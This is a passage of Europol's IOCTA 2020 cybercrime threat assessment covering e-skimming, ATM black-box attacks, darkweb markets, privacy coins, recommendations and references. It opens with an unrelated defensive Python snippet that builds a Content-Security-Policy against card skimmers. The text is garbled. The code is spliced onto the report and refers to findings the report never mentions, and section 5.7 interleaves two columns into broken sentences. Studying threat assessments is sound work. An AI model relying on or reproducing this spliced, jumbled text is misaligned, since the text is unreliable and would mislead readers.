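def csp_for(allowed_hosts):
    """A Content-Security-Policy that would have blocked both findings on the sample page:
    scripts only from listed hosts, no outbound connections or image loads elsewhere."""
    hosts = " ".join(f"https://{h}" for h in sorted(allowed_hosts))
    return (f"script-src {hosts}; connect-src 'self'; img-src 'self'; "
            f"form-action 'self'; object-src 'none'; base-uri 'self'")
```

The heuristics are deliberately loose and are meant to be run on a fetched copy of the live checkout page on a schedule, with any new external host treated as an incident rather than a warning; a view of the DOM after the page has loaded misses a self-removing skimmer, which is why the scan works on the served HTML. Subresource Integrity on the allowlisted scripts and the policy from `csp_for` address the service-provider entry point mentioned above.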
Darkweb marketplaces enable the increase of e-skimming

Dedicated forums give cybercriminals the possibility to offload their stolen credit card data in a relatively low-risk and efficient way. The forums also provide user-friendly interfaces for fraudsters seeking to buy them. At the same time, CaaS has created competition between various underground forums, where cybercriminals are offering their sniffers and skimmers with constantly improved capabilities.

E-skimming poses a significant challenge to law enforcement and industry

While it is an increasing threat causing significant losses, detection of e-skimming is often difficult. Merchants do not necessarily realise that they have been infected, as it is the card-issuing banks that notice the frauds first. Reporting back to the merchant does not always take place, especially if the bank and the merchant are in different countries, in which case it can be difficult to determine who is liable for covering the losses: the bank or the merchant. In addition to the difficulty of timely detection, there are currently no anticipated technological or legal drivers to deter criminal groups conducting Magecart-style attacks, which is likely going to lead to a further increase in these types of attacks.

Digital fingerprints for sale

Continuing innovative developments of recent years, criminals are offering full digital user profiles in order to bypass advanced fraud prevention tools. In keeping up with e-commerce merchants increasingly employing analytics that check a user's identity against device fingerprints and several other metrics, criminals have moved to obtaining and selling these digital profiles to commit fraud. Taken from machines compromised in a botnet, they are used in order to make purchases using the compromised computer, pretending to be a returning customer, using the same browser settings and the victim's card credentials. After the fraud, many victims erase the evidence themselves, following Windows security guidance to restore to the last known configuration after having been compromised by the botnet, effectively removing all traces of the intrusion. This use of botnets to bypass sophisticated fraud prevention tools reflects a recurrent theme in the fight against cybercrime: as security measures are heightened, criminals come up with novel ways to continue their illicit activities.

4.6 TERMINAL ATTACKS INCREASE AS POPULARITY OF BLACK-BOX ATTACKS SOARS

Logical attacks on ATMs and POS devices remain a threat and have increased across most Member States. Among these, especially black-box attacks have proven popular, as organised criminal groups successfully manage to extract large amounts of cash in short periods of time. Black-boxing involves the installation of an external device connected to the cash dispenser in order to bypass the need for a card authorisation to dispense cash. Typically, the actual installation of the black box requires little technical knowledge besides the provision of the device and instructions. With cybercriminals remotely sending instructions to jackpot the ATMs, itinerant criminal networks are able to operate across several locations in different countries within a few days, requiring a quick law enforcement response and international cooperation in order to stop them. These criminal groups are often Russian-speaking and with links to Eastern Europe, actively targeting ATMs across Europe.

Criminals are targeting mostly older ATM models, for which security measures and software have not been updated. While the modi operandi here remain largely the same, with occasional developments taking place in accordance with improved ATM security measures, law enforcement agencies noticed some changes in modi operandi over the past twelve months. As such, one Member State respondent saw a particularly ingenious criminal group using a new type of modus operandi for each attack, including malware to check the balance of an ATM before deciding to attack it.
5 CRIME PRIORITY: The criminal abuse of the darkweb

KEY FINDINGS

• The Darkweb environment has remained volatile, lifecycles of Darkweb market places have shortened, and no clear dominant market has risen over the past year compared to previous years to fill the vacuum left by the 2019 takedowns.

• There has been an increase in the use of privacy-enhanced cryptocurrencies and an emergence of privacy-enhanced coinjoin concepts, such as Wasabi and Samurai.

• The nature of the Darkweb community at the administrator level shows how adaptive it is under challenging times, including more effective cooperation in the search for better security solutions and safe Darkweb interaction.

• Surface web e-commerce sites and encrypted communication platforms offer an additional dimension to Darkweb trading to enhance the overall business model.
5.1 INTRODUCTION

In 2019 and early 2020, a high level of volatility on the Darkweb was witnessed. Following protective measures which multiple marketplaces have implemented, the situation has calmed down considerably. Nevertheless, the Darkweb environment remains difficult to disrupt, as developments are often challenging to anticipate. This adds to the law enforcement challenges with respect to this growing threat, which continues to function as a key facilitator for many other forms of crime.

5.2 MARKETPLACE DEVELOPMENTS

More marketplaces based on purchased scripts have launched over the past twelve months, but some of these disappeared due to hacking or exit scams. The decrease in large-scale marketplaces has led to an increase in smaller marketplaces, in some cases catering to specific users or needs. Some of these markets are growing and, as they gain positive feedback from users, they are becoming increasingly stable. Users are monitoring ratings and usually tend to keep to stable markets and vendors with high ratings. The market community has engaged in new ways of building trust with its users by developing cross-cutting solutions on information and reliability. A new site called DarkNet Trust has emerged which verifies vendors' reputations by searching through usernames and PGP fingerprints, and it is able to search over ten thousand profiles from marketplaces[52].

After the takedown of DeepDotWeb mentioned in the IOCTA 2019[53], centralisation of information on Darkweb markets has stabilised and even increased. DeepDotWeb was a popular information service which made it easier for users to navigate the Darkweb ecosystem. Users are now looking to set up information hubs to increase user-friendliness in the Darkweb environment, and sites such as dark.fail and darknetlive.com have taken over DeepDotWeb's role as information hubs. Dread, a popular Darkweb forum found on The Onion Router (Tor), continues to operate, having been around for approximately three years. The administrators of Dread additionally produced a DDoS protection solution (nicknamed Endgame Filter), which is free to use for other marketplaces, therefore expanding their role beyond a traditional information hub. Developers have also produced a Darkweb search engine termed Recon, a service allowing users to see what kind of drugs are for sale on the Darkweb, what vendors there are and what ratings they have. Another example of a Darkweb search engine is Kilos, which emerged in November 2019, reportedly as a potential follow-up of Grams. Grams was a Darkweb search engine which ceased operations in 2017[54]. Since going online, Kilos seems to have adopted the objective of indexing more platforms and adding more search functionalities than Grams. Moreover, Digital Shadows describes how "Kilos has introduced updates, new features, and services that aim to ensure security and anonymity for its users and also add a more human element to the site not previously seen on other prominent Darkweb-based search engines."[55]

Even though marketplaces continue to appear and disappear, an increasing number of operationally secure marketplaces, such as wallet-less and user-less markets, have emerged. Additionally, some marketplaces have intentionally relatively short lifecycles, which pose a challenge to law enforcement investigations. Short life cycles are making it difficult for law enforcement to investigate criminal cases. Administrators seem to want to stay under the radar of law enforcement by knocking down markets and keeping market lifecycles low.
Darkweb child abuse: administrator of DarkScandals arrested in the Netherlands

Early in March 2020, Europol announced the successful takedown of DarkScandals, a website which hosted non-consensual and violent sex videos, including elements of rape, torture, human trafficking and CSE. The website had claimed it hosted thousands of videos of this kind of footage from all around the world. The Dutch law enforcement authorities and national prosecutor's office cooperated with German authorities, US law enforcement authorities and the US Department of Justice and Europol in an operation to arrest the administrator and take down the DarkScandals website. The administrator, a Dutch national, had allegedly received over 2 million dollars in exchange for selling the content on the website. The offender was charged with several counts of distribution of CSAM, production and transportation of obscene matters for sale or distribution, engaging in the business of selling or transferring obscene matter, and laundering of monetary instruments[59].

5.3 ADMINISTRATORS AND USERS ADAPT AS THEY AIM TO ENHANCE SECURITY AND RESILIENCE

Furthermore, Darkweb administrators have been observed pulling together and showing a collaborative spirit to maintain the environment under challenging circumstances. When faced with similar challenges, forum and service administrators have been seen working more closely together over sharing code and security methodologies (i.e. anti-DDoS measures, avoiding scams, creating trust-building sites to help users navigate vendors across different marketplaces, etc.). The Darkweb is essentially shaping into a 'business sector' in itself. There are also differences in the way administrators conduct their business on the Darkweb. Some present themselves as having a moral compass, banning items relating to the COVID-19 pandemic crisis, for example. This is not typical across the Darkweb, but it is an indication that some administrators differ in their approaches to conducting illicit trade.

Administrators are also looking to upgrade their security apparatus with other new features. Some marketplaces are already shifting to wallet-less and user-less markets, adopting multi-signatures on Bitcoin and Monero, lacking registration requirements and enacting no-JavaScript policies. Monopoly is also a wallet-less market in which payment occurs directly between buyer and vendor, and instead of enacting transaction fees, the market receives a monthly commission. Marketplaces were observed using multi-signature wallets in their transactions[56].

Users have also opted to use safer communication methods. The reputation of Protonmail, an encrypted email service considered to be a former favourite among Darkweb users[57], has suffered after accusations that it has been helping law enforcement. Due to this, Darkweb users are shifting to new emerging encrypted email services such as Sonar and Elude[58].

In addition to encrypted email services, Darkweb users are relying increasingly on popular digital communication channels such as Discord, Wickr and Telegram. As these offer some degree of anonymity to the users, criminals consider them a safe place. This has introduced new initiatives, such as the Telegram vending service bot.

5.4 INFRASTRUCTURE PREFERENCES REMAIN STABLE, BUT CRIMINALS DO USE ALTERNATIVES

In terms of the Darkweb infrastructure, Tor remains the preferred option. As a result, criminal usage of Tor continues to be the primary focus. However, criminals have started to use other privacy-focused, decentralised marketplace platforms, such as OpenBazaar and Particl.io, to sell their illegal goods. The emergence of decentralised privacy-oriented platforms is not a new phenomenon in the Darkweb ecosystem, but they have started to attract increasing interest over the last year. OpenBazaar in particular is noteworthy, as certain high-priority threats have emerged on the platform over the past year. These include those banned by some of the other Tor market-based administrators, such as weapons and fentanyl. Even though the numbers may be considered limited, the nature of these items means the focus ought to be on impact rather than volume. COVID-19 related items also emerged on OpenBazaar during the pandemic. OpenBazaar has advertised a mobile platform, Haven, which has seen thousands of downloads on Android[60].

5.5 PRIVACY ENHANCING WALLETS EMERGE AS A TOP THREAT, AS PRIVACY ENHANCING COINS GAIN POPULARITY

With respect to cryptocurrency on the Darkweb, privacy-enhanced wallet services using coinjoin concepts (for example Wasabi and Samurai wallets) have emerged as a top threat in addition to well-established centralised mixers. Apart from expected functionality, including advanced decentralised coin mixing or integration of Tor, these offer additional features. Samurai, for example, offers remote wipe SMS commands when under distress. These wallets do not necessarily remove the link between the origin and destination of the funds, but they certainly make cryptocurrency tracing much more challenging. Some administrators of underground markets are trying to apply these wallets to their payment systems. Threat actors have also been witnessed increasingly using hardware wallets, a separate physical device which securely stores seeds and private keys for a wide range of cryptocurrencies.

Initially, Darkweb markets relied solely on Bitcoin. However, over the past few years this has changed. An increasing number of markets are recognising the benefits of offering multiple coin alternatives, including Litecoin, Ethereum, Monero, Zcash, and Dash. While Bitcoin still remains the most popular payment method (mainly due to its wide adoption, reputation and ease of use), the use of privacy-enhanced cryptocurrencies has somewhat increased, albeit not at the rate expected by their proponents. Monero is gradually becoming the most established privacy coin for Darkweb transactions, followed by Zcash and Dash. All these privacy coins may present a considerable obstacle to law enforcement investigations, despite the competing altcoin communities uncritically favouring their own implementation over the others.

5.6 SURFACE WEB PLATFORMS OFFER AN ADDITIONAL DIMENSION TO DARKWEB TRADING

Some platforms existing on the clear web (or surface web) are also catering for Darkweb goods and services, which offers additional benefits for criminals' business models. A number of cybercriminals are relying on surface-level e-commerce platforms for increased visibility, posting links to their online digital goods stores. One case involved an e-commerce platform registered to a company based in the Middle East, hosting online stores selling malicious digital tools from Arabic, Russian, and English language-based underground forums (links were found to underground forum administrators, including cracked.to and nulled.to). Stores on the platform also offered stolen accounts, databases, carding, crypters, banking malware, ransomware and variants of the Mirai botnet. This platform allowed sellers to accept payments through PayPal and cryptocurrencies[61]. Surface e-commerce sites are useful for cybercriminals, as they allow them to showcase their products and services, and they are legitimately registered businesses. Law enforcement also found cybercrime tools available on other clear web sites.

5.7 STEADY SUPPLY OF DIVERSE DARKWEB MARKET ITEMS


There has been an increase in the provision of digital which makes it difficult to prioritise within the drug topic.
and cybercrime elements on the Darkweb. Personal Additionally, the COVID-19 pandemic crisis seemed to
data, access to compromised systems (e.g. through have the most effect on the supply chains regarding
RDP application), as well as services catering malware, drug trade compared to other crime. This has now
ransomware and DDoS attacks, are all elements stabilised and the situation has returned to normal, with
prevalent for the facilitation of cybercrime. Document an anticipated growth on the horizon.
and proof of identity services have also increased on
the Darkweb. Perpetrators generally use identity and Finally, the distribution of firearms has become
document services to support citizenship claims and significantly more fragmented. After the takedown
other applications, obtaining lines of credit to set up a of the Berlusconi marketplace by Italian law
business, open untraceable bank accounts, proof of enforcement, which used to be the go-to place for
residence, to commit insurance fraud, purchase illicit items and other uses. There has been a shift in the offering of legitimate-looking counterfeit passports to “legal or registered” passports, which can pass several authentication tests, with criminals offering registered passport services. Trend Micro Inc. explains that the increase of global immigrants and the increasing adoption of e-passports is a likely driver behind this trend [62]. Additionally, some Darkweb sites also promote money laundering and instructions for users on how to use cryptocurrencies for money laundering.

Users can find drug listings in massive volume on the Darkweb; however, these do not necessarily reach priority-levels in terms of impact. More impactful, dangerous drugs, such as fentanyl, opioids and heroin are still significantly present on the Darkweb, although listings are smaller in number. Europol has observed an increasing trend of top organised crime groups having a presence on the Darkweb dealing drugs, which is likely due to an effort to expand their distribution mechanisms. As noted in IOCTA 2019, drug dealers may also be running multiple monikers on the Darkweb, [...] firearms on the Darkweb, firearms have emerged on different marketplaces. Firearms are also available on OpenBazaar, although the scale of supply is unconfirmed. Some shops are also selling firearms from the United States. The ability for individuals to purchase firearms on the Darkweb has become increasingly difficult, due to recent law enforcement successes in catching individuals purchasing firearms illegally.

The diverse products and services vary in their level of impact and their ability to facilitate more serious forms of crime. The supply of these goods on the Darkweb poses a significant threat in the EU. Furthermore, the geographic nature of the threat is also diversifying. The Hydra market – the largest darknet marketplace serving Russia and neighbouring countries – has recently advertised an impending publication of a new, secure encrypted market platform, which they aim to open to the English-speaking community. Such a development would arguably make Darkweb investigations more difficult for law enforcement in the future and poses a significant threat to the EU.
_60 IOCTA 2020 Recommendations

Recommendations

The following section consists of highlights from this year’s Member State and partner interviews combined with Europol insights. The majority of the responses resonated with previously reported recommendations focusing on recurring themes, such as:

» coordination and cooperation;
» information sharing (removing practical obstacles, enhancing judicial cooperation, reducing time, fostering a culture of transparency and trust);
» enhancing the legal framework;
» prevention and awareness;
» capacity building.

Coordination and cooperation remain critical

There is little doubt that cybercrime requires more effective cooperation between private and public sector parties. Attackers use a coordinated approach and share infrastructure, which makes a broad and cohesive response to the criminal developments even more important. This also requires the engagement of multiple levels of collaboration.

More taskforce-like approaches, which have worked especially well in the Netherlands and the UK, would be beneficial. Considering the global nature of the Darkweb ecosystem and the cross-border interaction of its users, the key recommendation is to establish a dedicated multinational Darkweb task force to approach the problem. This would help address legal jurisdiction challenges and obstacles hindering coordination.

Pre-investigative actions and information sourcing should be enabled with a dedicated centralised approach in the EU. This would help identify, firstly, priority cases and criminals and, secondly, the appropriate jurisdiction over cases, and highlight the most efficient ways of cooperating over specific cases and operations.

There is a persistent need for better cooperation with hosting services, social media platforms, and ISPs. Companies need to be more proactive in identifying illegal content and activity and blocking it as soon as they detect it. One way of improving this is to invest in technologies that make sure their platforms are clean. They should also be able to demonstrate more willingness to assist law enforcement agencies to deal with, for example, CSE, and show improved openness and transparency.
Information sharing becomes even more crucial to offer timely response to cybercrime

Efficient and timely information gathering, analysis and sharing are crucial for fighting cybercrime. To this end, information sharing should be harmonised (what information can be shared between parties) and institutionalised. Structured efforts need to be put into place, increasing trust among the parties sharing information.

We must develop a culture of acceptance and transparency, and incentives for victims to bring their incidents to light and not fear penalties and re-victimisation for being targeted by cyber-attacks.

Considering the fast nature of cybercrime, it is important to make the exchange of information in the context of international cooperation faster by implementing channels with, for example, the relevant ISPs at the European level (VPN, anonymisers, anonymous email providers, cryptocurrency exchanges, etc.).

Enhancing the legal framework

International law and national legislation should be better aligned with investigation practices in cybercrime. The link between legislation and investigative practices requires more focus.

There should be more relevant and focused legislation addressing bulletproof hosts and registrars, whose voluntary cooperation with law enforcement varies.

Darkweb threat actors’ increasing reliance on encrypted email services, privacy-enhanced cryptocurrencies and BPH providers poses a substantial problem to law enforcement. This calls for increased KYC-type policies.

Prevention and awareness as well as crisis management

As indicated in many parts of the IOCTA, criminals remain successful because of inadequate cyber hygiene and an inability of victims to detect cybercriminal activities. This inability often stems from a lack of awareness on the side of the victim. This recurs in many different forms of crime, including social engineering and phishing, as well as investment fraud. A lack of knowledge and awareness of the risk related to online CSE is also one of the drivers behind the increase in online CSAM. This highlights the need to continue promoting preventive and educational initiatives in a coordinated and structural manner across Europe.

In addition to raising awareness, there are calls for more effort on improving general cyber preparedness, including crisis management, exercises and disaster recovery plans. This is a recommendation which Europol, in cooperation with its partners, has responded to through its efforts with respect to the Law Enforcement Emergency Response Protocol (LE ERP). Developing evaluation schemes to assess and test IT security of infrastructure and devices, establishing rules and setting guidelines could increase resilience against cybercrime.

Capacity building

Cyber elements are becoming more and more visible in other areas of criminality and increasing numbers of these criminal activities are becoming cyber-enabled. This trend requires increased capacity among law enforcement to deal with this evolving challenge. Integrating cyber elements into law enforcement readiness already at the police academy level would enable educating and facilitating individuals who want to specialise in cybercrime. Effective investigations require technical expertise (civilian) and experience in criminal cases (law enforcement). Every police force should be responsible for developing knowledge within their units.
References

1 Durbin, Steve, “The Future’s Biggest Cybercrime Threat May Already Be Here”, https://www.darkreading.com/vulnerabilities---threats/the-futures-biggest-cybercrime-threat-may-already-be-here/a/d-id/1338439, 2020

2 Europol, “Staying Safe During COVID-19: What you need to know”, https://www.europol.europa.eu/activities-services/staying-safe-during-covid-19-what-you-need-to-know, 2020

3 The European Union External Action Service (EEAS), “A Europe that Protects: Countering Hybrid Threats”, https://eeas.europa.eu/topics/economic-relations-connectivity-innovation/46393/europe-protects-countering-hybrid-threats_en, accessed 27 July 2020, 2020

4 Europol, Catching the virus: cybercrime, disinformation and the COVID-19 pandemic, 2020

5 Wolford, Ben, “Does the GDPR apply to companies outside the EU?”, https://gdpr.eu/companies-outside-of-europe/, 2020

6 Palmer, Danny, “GDPR: 160,000 data breaches reported already, so expect the big fines to follow”, https://www.zdnet.com/article/gdpr-160000-data-breaches-reported-already-so-expect-the-big-fines-to-follow/, 2020

7 Schwab, Pierre-Nicolas, “European GDPR statistics: evolution of the number of complaints per country”, https://www.intotheminds.com/blog/en/gdpr-statistics-europe/, 2019

8 Verizon, 2020 Data Breach Investigations Report, 2020

9 Many interviewees used the term sophistication in connection to a variety of threats. The widespread use of the term, however, also makes its value as a descriptor limited. Certain sources aim to further unravel the answer to what makes a particular tactic or modus operandi sophisticated. See DePaula, Nic & Sanjay Goel, “A Sophistication Index for Evaluating Security Breaches”, 11th Annual Symposium on Information Assurance, 2016, and Buchanan, Ben, “The Legend of Sophistication in Cyber Operations”, https://www.belfercenter.org/publication/legend-sophistication-cyber-operations, 2017

10 Europol, Catching the virus: cybercrime, disinformation and the COVID-19 pandemic, 2020

11 See IIJ America, “Allow / Deny List (Domain Policy Set Level)”, https://iijasd.zendesk.com/hc/en-us/articles/206289805-Allow-Deny-List-Domain-Policy-Set-Level-, 2015, and the UK National Cyber Security Centre, “Terminology: it’s not black and white”, https://www.ncsc.gov.uk/blog-post/terminology-its-not-black-and-white, 2020

12 Chainalysis, “The Chainalysis Crypto Crime Report is Here. Download to Learn Why 2019 Was the Year of the Ponzi Scheme”, https://blog.chainalysis.com/reports/cryptocurrency-crime-2020-report, 2020

13 Paquet-Clouston et al., “Spams meet Cryptocurrencies: Sextortion in the Bitcoin Ecosystem”, Advances in Financial Technology (AFT19), https://arxiv.org/pdf/1908.01051.pdf, 2019

14 BBC, “Coincheck: World’s biggest ever digital currency ‘theft’”, https://www.bbc.com/news/world-asia-42845505, 2018

15 At the time of writing – August 2020.

16 European Commission, “February infringements package: key decisions”, https://ec.europa.eu/commission/presscorner/detail/en/inf_20_202, 2020

17 Coin ATM Radar, https://coinatmradar.com/, 2020

18 European Commission, “Protecting victims’ rights”, https://ec.europa.eu/info/policies/justice-and-fundamental-rights/criminal-justice/protecting-victims-rights_en#:~:text=The%20European%20Commission%20presented%20on,fully%20rely%20on%20their%20rights, 2020

19 See for example https://twitter.com/EC3Europol activities.

20 For more information see Europol and Eurojust’s reports on the Observatory Function.

21 Alrwais, Sumayah et al., “Under the Shadow of Sunshine: Understanding and Detecting Bulletproof Hosting on Legitimate Service Provider”, IEEE Symposium on Security and Privacy, 2017

22 State Criminal Police Office Rhineland-Palatinate, https://www.presseportal.de/blaulicht/pm/29763/4387169, 2019

23 Chainalysis, “Ransomware Attackers Aren’t Sparing Anyone During Covid-19”, https://blog.chainalysis.com/reports/ransomware-covid-19, 2020. Also see BBC News, “NHS ‘could have prevented’ WannaCry ransomware attack”, https://www.bbc.com/news/technology-41753022, 2017, and Winder, Davey, “Infection Hits French Hospital Like It’s 2017 As Ransomware Cripples 6,000 Computers”, https://www.forbes.com/sites/daveywinder/2019/11/20/infection-hits-french-hospital-like-its-2017-as-ransomware-cripples-6000-computers/#5db5ae55576e, 2019

24 Krebs, Brian, “REvil Ransomware Gang Starts Auctioning Victim Data”, https://krebsonsecurity.com/2020/06/revil-ransomware-gang-starts-auctioning-victim-data/, 2020

25 Europol, Internet Organised Crime Threat Assessment (IOCTA) 2018, 2018

26 Krebs, Brian, “REvil Ransomware Gang Starts Auctioning Victim Data”, https://krebsonsecurity.com/2020/06/revil-ransomware-gang-starts-auctioning-victim-data/, 2020

27 Goodin, Dan, “LockBit Is the New Ransomware for Hire”, https://www.wired.com/story/lockbit-is-the-new-ransomware-for-hire/, 2020

28 Virsec, “Maze & Other Ransomware Groups Say They Won’t Attack Hospitals During COVID-19 Outbreak - But How Trustworthy Is Their Word?”, https://virsec.com/maze-and-other-ransomware-groups-say-they-wont-attack-hospitals-during-covid19-outbreak-but-how-trustworthy-is-their-word/, 2020

29 Hammersmith Medicines Research, “HMR targeted by cyber criminals”, https://www.hmrlondon.com/hmr-targeted-by-cyber-criminals, 2020

30 Intel 471, “Understanding the relationship between Emotet, Ryuk and Trickbot”, https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/, 2020

31 AWS Shield, “Threat Landscape Report – Q1 2020”, https://aws-shield-tlr.s3.amazonaws.com/2020-Q1_AWS_Shield_TLR.pdf, 2020

32 European Commission, “Preventing and Combating Child Sexual Abuse and Exploitation: Towards an EU Response”, https://audiovisual.ec.europa.eu/en/video/I-191928, 2020

33 Canadian Centre for Child Protection, “International Survivors’ Survey”, https://protectchildren.ca/en/programs-and-initiatives/survivors-survey/, 2017

34 Europol, “Exploiting isolation: offenders and victims of online child sexual abuse during the COVID-19 pandemic”, https://www.europol.europa.eu/publications-documents/exploiting-isolation-offenders-and-victims-of-online-child-sexual-abuse-during-covid-19-pandemic, 2020

35 Canadian Centre for Child Protection, “International Survivors’ Survey”, https://protectchildren.ca/en/programs-and-initiatives/survivors-survey/, 2017

36 Europol, “Partners & Agreements – Police2Peer: Targeting file sharing of child sexual abuse material”, https://www.europol.europa.eu/partners-agreements/police2peer, 2020

37 Europol, “Exploiting isolation: offenders and victims of online child sexual abuse during the COVID-19 pandemic”, https://www.europol.europa.eu/publications-documents/exploiting-isolation-offenders-and-victims-of-online-child-sexual-abuse-during-covid-19-pandemic, 2020

38 BBC News, “NSPCC urges Facebook to stop encryption plans”, https://www.bbc.com/news/technology-51391301, 2020, and Musil, Steven, “Facebook urged to halt encryption push over child abuse concerns”, https://www.cnet.com/news/facebook-urged-to-halt-encryption-push-over-child-abuse-concerns/, 2020

39 Europol, “International police cooperation leads to arrest of Darkweb child sex abuser in Spain”, https://www.europol.europa.eu/newsroom/news/international-police-cooperation-leads-to-arrest-of-dark-web-child-sex-abuser-in-spain, 2020

40 Europol, “Operation CHEMOSH: how encrypted chat groups exchanged Emoji ‘stickers’ of child sexual abuse”, https://www.europol.europa.eu/newsroom/news/operation-chemosh-how-encrypted-chat-groups-exchanged-emoji-%E2%80%98stickers%E2%80%99-of-child-sexual-abuse, 2020

41 Europol, “Exploiting isolation: offenders and victims of online child sexual abuse during the COVID-19 pandemic”, https://www.europol.europa.eu/publications-documents/exploiting-isolation-offenders-and-victims-of-online-child-sexual-abuse-during-covid-19-pandemic, 2020

42 Wongsamuth, Nanchanok, “Online child sexual abuse cases triple under lockdown in Philippines”, https://news.trust.org/item/20200529090040-3ejzo/, 2020

43 Europol, “90 suspects identified in major online child sexual abuse operation”, https://www.europol.europa.eu/newsroom/news/90-suspects-identified-in-major-online-child-sexual-abuse-operation, 2020

44 Europol, Internet Organised Crime Threat Assessment (IOCTA) 2019, 2019

45 Europol, “COVID-19: Child Sexual Exploitation”, https://www.europol.europa.eu/covid-19/covid-19-child-sexual-exploitation, 2020

46 Europol, “COVID-19: Child Sexual Exploitation”, https://www.europol.europa.eu/covid-19/covid-19-child-sexual-exploitation, 2020

47 Europol, “The SIM hijackers: How criminals are stealing millions by highjacking phone numbers”, https://www.europol.europa.eu/newsroom/news/sim-highjackers-how-criminals-are-stealing-millions-highjacking-phone-numbers, 2020

48 Europol, “The SIM hijackers: How criminals are stealing millions by highjacking phone numbers”, https://www.europol.europa.eu/newsroom/news/sim-highjackers-how-criminals-are-stealing-millions-highjacking-phone-numbers, 2020

49 Cimpanu, Catalin, “FBI: BEC scams accounted for half of the cyber-crime losses in 2019”, https://www.zdnet.com/article/fbi-bec-scams-accounted-for-half-of-the-cyber-crime-losses-in-2019/, 2020

50 Stupp, Catherine, “Fraudsters Used AI to Mimic CEO’s Voice in Unusual Cybercrime Case”, https://www.wsj.com/articles/fraudsters-use-ai-to-mimic-ceos-voice-in-unusual-cybercrime-case-11567157402, 2019

51 Krebs, Brian, “Wawa Breach May Have Compromised More Than 30 Million Payment Cards”, https://krebsonsecurity.com/tag/jokers-stash/, 2020

52 Fuentes, Mayra Rosario, “Shifts in Underground Markets: Past, Present, and Future”, 2020

53 Europol, Internet Organised Crime Threat Assessment (IOCTA) 2019, 2019

54 Digital Shadows, “Darkweb Search Engine Kilos: Tipping the Scales In Favor of Cybercrime”, https://www.digitalshadows.com/blog-and-research/dark-web-search-engine-kilos/, 2020

55 Digital Shadows, “Darkweb Search Engine Kilos: Tipping the Scales In Favor of Cybercrime”, https://www.digitalshadows.com/blog-and-research/dark-web-search-engine-kilos/, 2020

56 Fuentes, Mayra Rosario, “Shifts in Underground Markets: Past, Present, and Future”, 2020

57 Fuentes, Mayra Rosario, “Shifts in Underground Markets: Past, Present, and Future”, 2020

58 Fuentes, Mayra Rosario, “Shifts in Underground Markets: Past, Present, and Future”, 2020

59 Europol, “Darkweb child abuse: administrator of Darkscandals arrested in the Netherlands”, https://www.europol.europa.eu/newsroom/news/dark-web-child-abuse-administrator-of-darkscandals-arrested-in-netherlands, 2020

60 Europol, Catching the virus: cybercrime, disinformation and the COVID-19 pandemic, 2020

61 Fuentes, Mayra Rosario, “Shifts in Underground Markets: Past, Present, and Future”, 2020

62 Fuentes, Mayra Rosario, “Shifts in Underground Markets: Past, Present, and Future”, 2020